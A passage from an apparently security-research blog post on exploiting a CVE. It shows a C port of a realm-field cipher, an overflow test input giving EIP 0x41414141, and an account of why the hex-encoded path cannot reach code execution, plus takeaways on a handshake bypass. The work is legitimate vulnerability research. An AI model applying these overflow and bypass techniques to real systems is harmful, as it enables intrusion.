<p>While searching for the right <code>realm</code> length, a shorter input did not overflow the saved EIP directly but did corrupt it through a second buffer. A function downstream of the <code>strcpy</code> runs the <code>realm</code> value through an internal block cipher (8-byte blocks, key in <code>.data</code>, output written via <code>sprintf("%02hhX", b)</code> into a separate stack buffer that is twice the input length). When the input is short enough to bypass the first overflow and long enough to overrun the ciphertext buffer, EIP is controlled, but only via the hex-string output of <code>sprintf</code>.</p>
<p>The cipher was small enough to port to C and run offline, with the seed key recovered from memory:</p>
<pre><code class="language-c">unsigned int shift_on_key(unsigned int tmp_bloc) {
    unsigned int idx;
    unsigned int s1, s2, s3, s4;

    idx = ((tmp_bloc &gt;&gt; 24) &amp; 0xff) * 4 + 0x048;
    s1  = *((unsigned int *)the_key + idx / sizeof(unsigned int));
    idx = ((tmp_bloc &gt;&gt; 16) &amp; 0xff) * 4 + 0x448;
    s2  = *((unsigned int *)the_key + idx / sizeof(unsigned int));
    idx = ((tmp_bloc &gt;&gt;  8) &amp; 0xff) * 4 + 0x848;
    s3  = *((unsigned int *)the_key + idx / sizeof(unsigned int));
    idx =  (tmp_bloc        &amp; 0xff) * 4 + 0xc48;
    s4  = *((unsigned int *)the_key + idx / sizeof(unsigned int));
    return (((s2 + s1) ^ s3) + s4);
}

/* get_new_key derives (key_part1, key_part2) from the previous key
   through 18 rounds of shift_on_key + xor with the static key blocs. */

int main(int argc, char **argv) {
    char *entry = argv[1];
    int i = 0;
    get_new_key(key, the_key);
    while (entry[i]) {
        for (int b = 0; b &lt; 8; b++) {
            unsigned int kpart = (b &lt; 4) ? key_part1 : key_part2;
            unsigned int sh    = (3 - (b &amp; 3)) * 8;
            if (entry[i]) newbuf[i] = entry[i] ^ ((kpart &gt;&gt; sh) &amp; 0xff);
            i++;
        }
        /* feed back the swapped output bloc as the next &quot;old key&quot; and re-derive */
        ...
        get_new_key(key, the_key);
    }
    /* hex-encode newbuf into realbuf with sprintf(&quot;%02hhX&quot;, ...) */
}
</code></pre>
<p>A search produced an input whose ciphertext ends in <code>\xAA\xAA</code>, which hex-encodes to <code>"AAAA"</code>, giving EIP = <code>0x41414141</code>:</p>
<pre><code>./a.out $(python -c 'print &quot;B&quot;*132 + &quot;\x43\x90&quot;')
... 3CCAF8EFDA95CFDA49177C2EAAAA
</code></pre>
<p>EIP control via the ciphertext path is real, but the path is dead. <code>sprintf("%02hhX", b)</code> emits two ASCII hex digits per byte, so each EIP byte is constrained to <code>0x30..0x39</code> or <code>0x41..0x46</code>. No address in the loaded modules or on the stack falls in that alphabet, and the shellcode has no leverage to encode arbitrary bytes through the cipher. The longer-payload approach above sidesteps this entirely.</p>
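<p>The alphabet restriction is easy to express as a predicate on candidate addresses. A minimal Python sketch, with the hypothetical name <code>reachable_via_hex</code>:</p>
<pre><code class="language-python">import string

# Bytes that sprintf('%02hhX', b) can emit: ASCII digits and uppercase A-F.
HEX_ALPHABET = set((string.digits + 'ABCDEF').encode('ascii'))

def reachable_via_hex(addr):
    '''True if every byte of a 32-bit address is an ASCII uppercase hex digit.'''
    return all(b in HEX_ALPHABET for b in addr.to_bytes(4, 'little'))

print(reachable_via_hex(0x41414141))   # True: the bytes are 'AAAA'
print(reachable_via_hex(0x02843728))   # False: 0x28, 0x84 and 0x02 are not hex digits

# Only 16 values per byte are available, so 16**4 addresses out of 2**32.
print(len(HEX_ALPHABET) ** 4)
</code></pre>
<p>Running the predicate over the address ranges of the loaded modules would be one way to confirm that no usable target exists.</p>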
<h2>Takeaways</h2>
<ul>
<li>Error and allocation paths are often the most valuable to read carefully. The <code>IppCreateServerRef</code>-returns-NULL branch was a complete bypass of the protocol-handshake gate, and it was visible in the CFG without any dynamic analysis.</li>
<li>Length caps distributed across binaries can be played against each other. The upstream <code>0x200</code> cap on the URL is what made the inner <code>0x100</code> prefix check trippable.</li>
<li>A failed exploitation path is still worth reproducing far enough to understand why it fails. Recovering the realm-cipher in C produced a clean structural reason to drop the path, rather than a vague &ldquo;didn&rsquo;t work&rdquo;.</li>
<li>On systems without DEP/ASLR, the gap between EIP control and arbitrary code execution is mostly bookkeeping. The harder problem in this CVE was reaching the vulnerable function at all.</li>
</ul>]]></description>
    </item>
  </channel>
</rss>
